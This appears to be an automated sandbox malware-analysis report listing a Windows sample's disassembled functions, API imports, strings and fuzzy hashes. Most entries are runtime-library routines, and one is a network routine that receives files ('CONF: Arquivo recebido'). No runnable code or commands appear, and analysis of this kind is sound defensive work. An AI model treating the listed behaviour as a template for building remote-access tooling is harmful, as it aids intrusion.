Part of subcall function 00007FF6B40A2518: _getptd.LIBCMT ref: 00007FF6B40A2522

Part of subcall function 00007FF6B40A25D4: GetOEMCP.KERNEL32 ref: 00007FF6B40A25FE

Part of subcall function 00007FF6B40A6724: malloc.LIBCMT ref: 00007FF6B40A6743
Part of subcall function 00007FF6B40A6724: Sleep.KERNEL32(?,?,00000000,00007FF6B40A5B2D,?,?,00000000,00007FF6B40A5BD7,?,?,00000000,00007FF6B40A2F21,?,?,00000000,00007FF6B40A2FD8), ref: 00007FF6B40A675A

free.LIBCMT ref: 00007FF6B40A2987

Part of subcall function 00007FF6B40A2198: HeapFree.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21AE
Part of subcall function 00007FF6B40A2198: _errno.LIBCMT ref: 00007FF6B40A21B8
Part of subcall function 00007FF6B40A2198: GetLastError.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21C0

_lock.LIBCMT ref: 00007FF6B40A29BF
free.LIBCMT ref: 00007FF6B40A2A6F
free.LIBCMT ref: 00007FF6B40A2A9F
_errno.LIBCMT ref: 00007FF6B40A2AA4

Strings

pWF, xrefs: 00007FF6B40A2A56, 00007FF6B40A2A63

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID: pWF
API String ID: 2878544890-3254099572
Opcode ID: fd34cdcd5848098e0a82380c24c5442fe87a055d6c1efdf08d913f45f74ac40f
Instruction ID: b347e5102ba03ff5e69b8994b72fd43b60f0b314475176d77b6340538c64ab53
Opcode Fuzzy Hash: fd34cdcd5848098e0a82380c24c5442fe87a055d6c1efdf08d913f45f74ac40f
Instruction Fuzzy Hash: B9514E76A0868287E764DF29A4C0279B6A1FF94B54F14423ADB9EC7395CF3CE842C711

Function 00007FFE1A527D30 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE1A527EAC
GetProcAddress.KERNEL32 ref: 00007FFE1A527EB8

Strings

api-ms-, xrefs: 00007FFE1A527DF6
ext-ms-, xrefs: 00007FFE1A527E09

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 58dbba6e90bbe7cdd9f870f1f6b0bf9c9ad0a445a5ca77e11af51acdebc8e115
Instruction ID: fbad03d9b747f2c84518571691ee5e52b80e001a01ce69b17a9cf2e0410ffde8
Opcode Fuzzy Hash: 58dbba6e90bbe7cdd9f870f1f6b0bf9c9ad0a445a5ca77e11af51acdebc8e115
Instruction Fuzzy Hash: C241DF21B1DE0291FA16DB67A80057626A6BF4AFB0F4846F7DD0D477A4EF3CE8048310

Function 0000000180022CE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113sleepwindowCOMMON

Download Yara Rule

APIs

LoadImageA.USER32 ref: 0000000180022DB0
SetSystemCursor.USER32 ref: 0000000180022DBB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180022E18
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180022E1E
SendMessageW.USER32 ref: 0000000180022E71
Sleep.KERNEL32 ref: 0000000180022E7C

Strings

\main, xrefs: 0000000180022D0F

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CursorImageLoadMessageSendSleepSystem
String ID: \main
API String ID: 1111376470-2779629487
Opcode ID: 95fabe1ab63231c5d411e18ac33f0ad47102503b417b3e9c1691b498f4a1e60d
Instruction ID: 9bf8b931e8b784570d819f5841916b26066c486489b38ea09431aad73a7676a5
Opcode Fuzzy Hash: 95fabe1ab63231c5d411e18ac33f0ad47102503b417b3e9c1691b498f4a1e60d
Instruction Fuzzy Hash: 1B41B672604B8882FF968B64E8453DA7791F78C7E0F518111F6AD47BE6DF78C6898B00

Function 00000001800066D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77networkthreadCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 0000000180006716
recv.WS2_32 ref: 000000018000674C
CreateThread.KERNEL32 ref: 0000000180006782
CreateThread.KERNEL32 ref: 0000000180006791
send.WS2_32 ref: 00000001800067E4

Strings

CONF: Arquivo recebido, xrefs: 00000001800067D6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CreateThreadrecv$send
String ID: CONF: Arquivo recebido
API String ID: 3383708001-1292242177
Opcode ID: b719061ba23d5fc5980c93cc8a432650fdc73fb740c9062d9abc095ddbfb19a0
Instruction ID: bc6bbee315c970b5dad7a7c4c008f5b8b76e9bb84c714b22195961e39b165fc6
Opcode Fuzzy Hash: b719061ba23d5fc5980c93cc8a432650fdc73fb740c9062d9abc095ddbfb19a0
Instruction Fuzzy Hash: 7C318D72A18B8882FBE2DB61F8447CA73A2BB4D7C8F449016F94947A65DE78C75C8701

Function 0000000180038E70 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000000180038E98
__scrt_acquire_startup_lock.LIBCMT ref: 0000000180038EEA
_RTC_Initialize.LIBCMT ref: 0000000180038F18
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000000180038F3E
__scrt_release_startup_lock.LIBCMT ref: 0000000180038F69

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: c110c6304340eb865fd133e866a08c5225b164fd027540a4d223a9183c30bf0b
Instruction ID: 0d3006f84ed185d8417305a9aac26f7ba8a905de162570dd555527e837dc2c4c
Opcode Fuzzy Hash: c110c6304340eb865fd133e866a08c5225b164fd027540a4d223a9183c30bf0b
Instruction Fuzzy Hash: 5981EF3170570E4AFAD7ABA598813DB2392AB8E7C0F16C065BA4947396DF38CB4D9700

Function 00007FF6B40A1FF8 Relevance: 12.1, APIs: 8, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF6B40A2059
_errno.LIBCMT ref: 00007FF6B40A208F
_errno.LIBCMT ref: 00007FF6B40A209D
_errno.LIBCMT ref: 00007FF6B40A20A9
_errno.LIBCMT ref: 00007FF6B40A20EB
_errno.LIBCMT ref: 00007FF6B40A20F5
_errno.LIBCMT ref: 00007FF6B40A211A

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 27a7679d749205b7c3a1dd25cf875e0a5e944942e0db682beb4ff8f0f0b7acb4
Instruction ID: 22b9b5493599d7cbf367a4aeae90d35731ce1e1eb739306d42bd1dd6031deb67
Opcode Fuzzy Hash: 27a7679d749205b7c3a1dd25cf875e0a5e944942e0db682beb4ff8f0f0b7acb4
Instruction Fuzzy Hash: AC31F526D0C64284EA60DF5DA5C107EB291FF947A4F64423AEB6C877D6CE7CE490C702

Function 00007FF6B40A7A14 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF6B40A7A3D
_errno.LIBCMT ref: 00007FF6B40A7A46
__doserrno.LIBCMT ref: 00007FF6B40A7A96
_errno.LIBCMT ref: 00007FF6B40A7A9D

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: ba47e0ad0d9c794fae333349718cc0a04b26f1c5d46e880776d1f94f39465e33
Instruction ID: 6b98366e136040550de5a7cf99a03626d9a5eeec4626fd2119170e05f91b8bcc
Opcode Fuzzy Hash: ba47e0ad0d9c794fae333349718cc0a04b26f1c5d46e880776d1f94f39465e33
Instruction Fuzzy Hash: A231C332A1864245E7169F69A8C267E7951AF807B0F159735EF7D4BBD2CE3CE4428700

Function 00007FF6B40A82AC Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF6B40A82D5
_errno.LIBCMT ref: 00007FF6B40A82DE
__doserrno.LIBCMT ref: 00007FF6B40A832D
_errno.LIBCMT ref: 00007FF6B40A8334

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 8d444f9988088e475fe8369e3dba05a0fd2282f7555e005a39a092a6cb4f6cf0
Instruction ID: 1140ad7c84cdb0c2e82013a2b320c05b88eb4235ac71af87706f7a6d6c7754e3
Opcode Fuzzy Hash: 8d444f9988088e475fe8369e3dba05a0fd2282f7555e005a39a092a6cb4f6cf0
Instruction Fuzzy Hash: 6A31D033A1C68285EB169F2EA8C267D7A50BF80760F555635EB29877D2CE3CE4028B00

Function 00007FF6B40AA120 Relevance: 12.1, APIs: 8, Instructions: 79COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF6B40AA13F
_errno.LIBCMT ref: 00007FF6B40AA148
__doserrno.LIBCMT ref: 00007FF6B40AA198
_errno.LIBCMT ref: 00007FF6B40AA19F

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: b22eea35fe6ad5e51efebd46ae4883902f64ef183099ecaac7773ae0ac8c24c0
Instruction ID: fcd8b87301e1168944d583dd55725a73c4b94656f4dbd926da898d1d76cb7935
Opcode Fuzzy Hash: b22eea35fe6ad5e51efebd46ae4883902f64ef183099ecaac7773ae0ac8c24c0
Instruction Fuzzy Hash: 9331B132A0C68245F7219F2DA8C267D7550BFC0710F144635EB29877C2CE3DA4428B00

Function 00007FFE1A51D9F8 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51DA3B
_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51DE28
_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51E0C4

Strings

p, xrefs: 00007FFE1A51DAED
f, xrefs: 00007FFE1A51DB5D
p, xrefs: 00007FFE1A51DB65

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: a71fc01dfa90504293c076bd080a3bce6e449ae2d9e9b2cd314f4c085412e53c
Instruction ID: 5ac00ba8eea159effb899e1d2cac25f5acd486e2f764261ffb7b831123d26efc
Opcode Fuzzy Hash: a71fc01dfa90504293c076bd080a3bce6e449ae2d9e9b2cd314f4c085412e53c
Instruction Fuzzy Hash: 62129373B0C94385FB24AA16D0546BA7253FB52F64F8445F7EA8A466E8DF3CE4849B00

Function 0000000180053A60 Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180053E96

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6799ba1aef90218bb706543ac0f502353d461879df726bfc28499f62b4bb22fa
Instruction ID: 8f439824226dab0019b6d578ae30927fa00b0f6c21d753ad2982692ad8d6df3e
Opcode Fuzzy Hash: 6799ba1aef90218bb706543ac0f502353d461879df726bfc28499f62b4bb22fa
Instruction Fuzzy Hash: 00C1D332204B8C86E7E29B15A4463DD7BA5F389BC4F5A8101FA4A277D1CF7ACA5DC710

Function 0000000180052468 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001800524AA
GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,25-11 C1,0000000180052427,?,?,FFFFFFFE,0000000180050D2E), ref: 0000000180052568
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,25-11 C1,0000000180052427,?,?,FFFFFFFE,0000000180050D2E), ref: 00000001800525F2

Strings

25-11 C1, xrefs: 000000018005246D

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID: 25-11 C1
API String ID: 2210144848-2243052442
Opcode ID: 2f8adf8f6545d9e2e5b46845051d5e46f88980f5f55ffb5506d06827e5848823
Instruction ID: 9342d21d516069435faa7e34a718300ba556c4caa2114961647f593be0edc859
Opcode Fuzzy Hash: 2f8adf8f6545d9e2e5b46845051d5e46f88980f5f55ffb5506d06827e5848823
Instruction Fuzzy Hash: CA81ED32710A1889FB92AF6598903EC27A4FB5EBD8F458111FE0A67791DF36C64EC710

Function 00007FF6B40A89CC Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B40A1780: _getptd.LIBCMT ref: 00007FF6B40A1796

_errno.LIBCMT ref: 00007FF6B40A8A0C
_errno.LIBCMT ref: 00007FF6B40A8BC6

Strings

0, xrefs: 00007FF6B40A8AD7
0, xrefs: 00007FF6B40A8B05
-, xrefs: 00007FF6B40A8A9E
+, xrefs: 00007FF6B40A8AA9

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno$_getptd
String ID: +$-$0$0
API String ID: 3432092939-699404926
Opcode ID: cb1d88ac3ec5f374b903bce960b2a170908b71560ba62a5417746cc99d89d075
Instruction ID: cda750576010d0057730f91476c69eb0d7787e4a64772a94ae71df74dae4c8a9
Opcode Fuzzy Hash: cb1d88ac3ec5f374b903bce960b2a170908b71560ba62a5417746cc99d89d075
Instruction Fuzzy Hash: 3871F263D2C68684FFB94F1D84D937A2690AF54754F294232CB5E866C1DF7CE888C701

Function 0000000180003300 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018000336A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00000001800033B2
_Getctype.LIBCPMT ref: 00000001800033CA
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180003482
_Getwctype.LIBCPMT ref: 00000001800034D1

Strings

bad locale name, xrefs: 00000001800034A5

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1386471777-1405518554
Opcode ID: 34e48a18e1be182421df65164db94a837ccd9bcdfec0ad5b92ed50b61e8c3d84
Instruction ID: a507680911f38970116a42384568ffe27f423e22da0921d863dad8be3e312e16
Opcode Fuzzy Hash: 34e48a18e1be182421df65164db94a837ccd9bcdfec0ad5b92ed50b61e8c3d84
Instruction Fuzzy Hash: 25516732B05B488AEB97CFB1D4913ED33B4FB58788F058115AE492BA56DF34966AC340

Function 000000018003ECBC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,000000018003EEC3,?,?,?,000000018003B9EE,?,?,?,000000018003B699), ref: 000000018003ED41
GetLastError.KERNEL32(?,?,00000000,000000018003EEC3,?,?,?,000000018003B9EE,?,?,?,000000018003B699), ref: 000000018003ED4F
LoadLibraryExW.KERNEL32(?,?,00000000,000000018003EEC3,?,?,?,000000018003B9EE,?,?,?,000000018003B699), ref: 000000018003ED79
FreeLibrary.KERNEL32(?,?,00000000,000000018003EEC3,?,?,?,000000018003B9EE,?,?,?,000000018003B699), ref: 000000018003EDBF
GetProcAddress.KERNEL32(?,?,00000000,000000018003EEC3,?,?,?,000000018003B9EE,?,?,?,000000018003B699), ref: 000000018003EDCB

Strings

api-ms-, xrefs: 000000018003ED61

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 20138d81cb2eb4f5615a145b45ed95f199f962382a2664473301abee9be348db
Instruction ID: 9abe0e4886cc0281bdce58a0b487e58583e9cd506748121f757d267b8e9a80c0
Opcode Fuzzy Hash: 20138d81cb2eb4f5615a145b45ed95f199f962382a2664473301abee9be348db
Instruction Fuzzy Hash: E831A33221678891EE97DB02A8407D63395F74DBE0F6A8625BD6D4B7D4DF78C6488310

Function 00007FF6B40A9F50 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF6B40A9F69
_errno.LIBCMT ref: 00007FF6B40A9FB6

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 51ab28dce4a9305a97c99358404d0bddcab6f800a04347f0f3fef48d223ec797
Instruction ID: 880b3246e857b781b9665af02e8fbd8ca45af3716566f6cbb8cf993acb90494a
Opcode Fuzzy Hash: 51ab28dce4a9305a97c99358404d0bddcab6f800a04347f0f3fef48d223ec797
Instruction Fuzzy Hash: 6231F222F1C64349FB119F7D94C6B7E7661AF80360F144239EB2D8A2C2CF7CA4019A14

Function 00007FF6B40A5ACC Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF6B40A5AF3

Part of subcall function 00007FF6B40A3C74: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF6B40A3ED0,?,?,?,?,00007FF6B40A5D5D,?,?,00000000,00007FF6B40A6748), ref: 00007FF6B40A3D37

Part of subcall function 00007FF6B40A38F8: ExitProcess.KERNEL32 ref: 00007FF6B40A3907

Part of subcall function 00007FF6B40A6724: malloc.LIBCMT ref: 00007FF6B40A6743
Part of subcall function 00007FF6B40A6724: Sleep.KERNEL32(?,?,00000000,00007FF6B40A5B2D,?,?,00000000,00007FF6B40A5BD7,?,?,00000000,00007FF6B40A2F21,?,?,00000000,00007FF6B40A2FD8), ref: 00007FF6B40A675A

_errno.LIBCMT ref: 00007FF6B40A5B35
_lock.LIBCMT ref: 00007FF6B40A5B49
free.LIBCMT ref: 00007FF6B40A5B6B
_errno.LIBCMT ref: 00007FF6B40A5B70
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6B40A5BD7,?,?,00000000,00007FF6B40A2F21,?,?,00000000,00007FF6B40A2FD8,?,?,?,00007FF6B40A300F), ref: 00007FF6B40A5B96

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
String ID:
API String ID: 1024173049-0
